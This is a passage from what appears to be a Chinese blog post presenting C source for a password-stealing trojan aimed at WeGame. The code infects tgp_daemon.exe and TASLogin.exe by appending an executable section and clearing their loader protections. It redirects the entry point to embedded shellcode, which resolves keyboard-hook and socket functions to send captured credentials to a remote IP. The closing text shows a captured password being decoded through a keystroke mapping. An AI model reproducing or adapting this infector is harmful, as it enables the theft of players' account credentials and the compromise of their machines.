		addSectionHeader.VirtualAddress = pPeHeader->OptionalHeader.SizeOfImage;//RVA: directly after the current image (assumes SizeOfImage is SectionAlignment-aligned)
		addSectionHeader.SizeOfRawData = dwApplySize;//on-disk size of the section
		// File offset: right after the last existing section's raw data.  This is
		// assumed, not checked, to be the end of the file: if the target has an
		// overlay (e.g. an Authenticode certificate table) the new data lands on
		// top of it, and if the headers place this offset beyond dwFileSize the
		// memcpy calls below write past the allocation.
		addSectionHeader.PointerToRawData = pSectionHeader[iSectionNum - 1].PointerToRawData + pSectionHeader[iSectionNum - 1].SizeOfRawData;//raw data start
		addSectionHeader.PointerToRelocations = 0;//these fields are not significant for an executable image
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.NumberOfRelocations = 0;
		addSectionHeader.PointerToLinenumbers = 0;//assigned twice; NumberOfLinenumbers is the field left uninitialized
		addSectionHeader.Characteristics = 0xF000000F;//0xF0000000 = MEM_SHARED|MEM_EXECUTE|MEM_READ|MEM_WRITE (an RWX section, a classic detection signal); the low nibble sets reserved bits
		// Append the header after the last existing entry.  No check that the
		// header area (SizeOfHeaders) has a free slot, so in a tightly packed file
		// this can clobber whatever follows the section table.
		memcpy((PBYTE)(&pSectionHeader[iSectionNum - 1]) + sizeof(IMAGE_SECTION_HEADER), (PBYTE)&addSectionHeader, sizeof(IMAGE_SECTION_HEADER));
		pPeHeader->FileHeader.NumberOfSections++;//bump the section count
		pPeHeader->OptionalHeader.DllCharacteristics = 0x0000;//clears every DllCharacteristics flag (DYNAMIC_BASE, NX_COMPAT, ...): the image loses those loader mitigations
		pPeHeader->OptionalHeader.AddressOfEntryPoint = pPeHeader->OptionalHeader.SizeOfImage;//new entry point = start of the appended section
		pPeHeader->OptionalHeader.SizeOfImage += 0x2000;//grow the mapped image by 0x2000 (same value as dwApplySize)
		//initialize the parameters: the strings the injected code looks up, plus the slots it stores into
		struct RemoteParameter remoteParameter;
		memset(&remoteParameter, 0, sizeof(remoteParameter));
		// c[0] stays zero (cBuffer).  The strlen copies omit the terminator, which
		// the memset above already supplies; cc[0] is copied with sizeof, so the
		// UTF-16 link name keeps its terminator.
		memcpy(remoteParameter.c[1], pUser32, strlen(pUser32));
		memcpy(remoteParameter.c[2], pWS2_32, strlen(pWS2_32));
		memcpy(remoteParameter.c[3], pLoadLibrary, strlen(pLoadLibrary));
		memcpy(remoteParameter.c[4], pGetProcAddress, strlen(pGetProcAddress));
		memcpy(remoteParameter.c[5], pGetCurrentThreadId, strlen(pGetCurrentThreadId));
		memcpy(remoteParameter.c[6], pSetWindowsHookEx, strlen(pSetWindowsHookEx));
		memcpy(remoteParameter.c[7], pCreateThread, strlen(pCreateThread));
		memcpy(remoteParameter.c[8], pCallNextHookEx, strlen(pCallNextHookEx));
		memcpy(remoteParameter.c[9], pWSAStartup, strlen(pWSAStartup));
		memcpy(remoteParameter.c[10], psocket, strlen(psocket));
		memcpy(remoteParameter.c[11], phtons, strlen(phtons));
		memcpy(remoteParameter.c[12], pIP, strlen(pIP));
		memcpy(remoteParameter.c[13], pinet_addr, strlen(pinet_addr));
		memcpy(remoteParameter.c[14], pconnect, strlen(pconnect));
		memcpy(remoteParameter.c[15], psend, strlen(psend));
		memcpy(remoteParameter.c[16], pclosesocket, strlen(pclosesocket));
		memcpy(remoteParameter.c[17], pWSACleanup, strlen(pWSACleanup));
		memcpy(remoteParameter.cc[0], pLinkName, sizeof(pLinkName));
		memcpy(remoteParameter.cc[1], pCreateFile, sizeof(pCreateFile));
		memcpy(remoteParameter.cc[2], pDeviceIoControl, sizeof(pDeviceIoControl));
		//write the parameter struct into the target image, 0x1000 bytes into the new section
		memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData + 0x1000, (PBYTE)&remoteParameter, sizeof(remoteParameter));
		//write the machine code (injected code) at the start of the new section
		if (i == 0) {
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode, sizeof(shellcode));//for tgp_daemon.exe
		}
		else
		{
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode2, sizeof(shellcode2));//for TASLogin.exe
		}
		//produce the infected program: rewind the handle and write the whole buffer over the original file
		DWORD dwWriteFact = 0;
		DWORD dwPointer = SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
		if (dwPointer == 0xffffffff) {
			printf("文件指针移到头出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		BOOL bRet = WriteFile(hFile, pFileMem, dwFileSize + dwApplySize, &dwWriteFact, NULL);
		if (!bRet || dwWriteFact != dwFileSize + dwApplySize) {
			printf("写出出错!");//a failed or short write is reported, but execution still falls through to the success message below
		}
		CloseHandle(hFile);
		GlobalFree(pFileMem);
		if (i == 0) {
			printf("感染tgp_daemon.exe成功!\n");
		}
		else
		{
			printf("感染TASLogin.exe成功!\n");
		}
	}
	system("pause");//keeps the console open; note system() spawns a shell
	
}

 

最终运行效果图:

      

 上面3个是驱动文件,中间右边是病毒EXE,中间左边是WeGame。

这两个是接收账号和密码的EXE。

上面是安装的驱动。

 感染效果图。

我输入的密码是0987654321,密码本是通过模拟按键1234567890获得的。可以看到模拟1234567890获得的对应关系是5341726890。接下来我捕获的未解密密码是0986271435,对照密码本翻译显然就是我的输入密码0987654321.O(∩_∩)O!!!


结语:

     作为一个新手写这个盗号木马其实还是碰到很多问题的,不知道调试了多少次-。-//。这个木马实用性不强,合适教学吧,或者娱乐哈哈。这里完整的介绍了一个木马的生成过程,不知道其他人怎么做木马的,是不是和我差不多-。-///。
